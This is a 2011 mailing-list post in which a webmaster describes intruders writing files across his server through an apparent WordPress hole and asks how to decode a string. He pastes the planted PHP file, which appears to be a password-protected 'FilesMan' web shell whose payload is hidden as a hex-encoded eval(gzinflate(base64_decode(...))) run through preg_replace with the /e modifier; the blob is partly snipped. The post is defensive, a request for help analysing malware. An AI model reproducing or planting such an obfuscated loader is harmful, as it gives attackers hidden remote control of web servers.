OT: Decrypting PHP preg_replace Strings

Sivakatirswami katir at hindu.org
Sun Dec 25 22:28:24 EST 2011


We have hackers on our web server getting in thru one Domain... I think 
there is a whole in WordPress.

Long story... a nuisance, But they are able to write files to locations 
out outside the blog directory, insert strings into the first line on 
.html files and are cloning our pages and storing them in obscure places 
like /var/lib/dovecot/control/theHackedDomain (this directory is deep in 
the system but writeable by the user for this domain)

We don't see how they are getting in. They are not able to touch 
anything else on the box..

anyway... is there a live code function that can decrypt the string at 
the and of this file?

--?php
$auth_pass = "347455f3975a7c84651eb69f10198b09";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl+cnr7pnsG37pPne4en9u[snip]
dLFUEiippqKn6fwE='\x29\x29\x29\x3B",".");?--

I can't wait until move our site over to RevIgniter; I think it will be 
much more secure!

Sivakatirswami
www.himlayanacademy.com






More information about the Use-livecode mailing list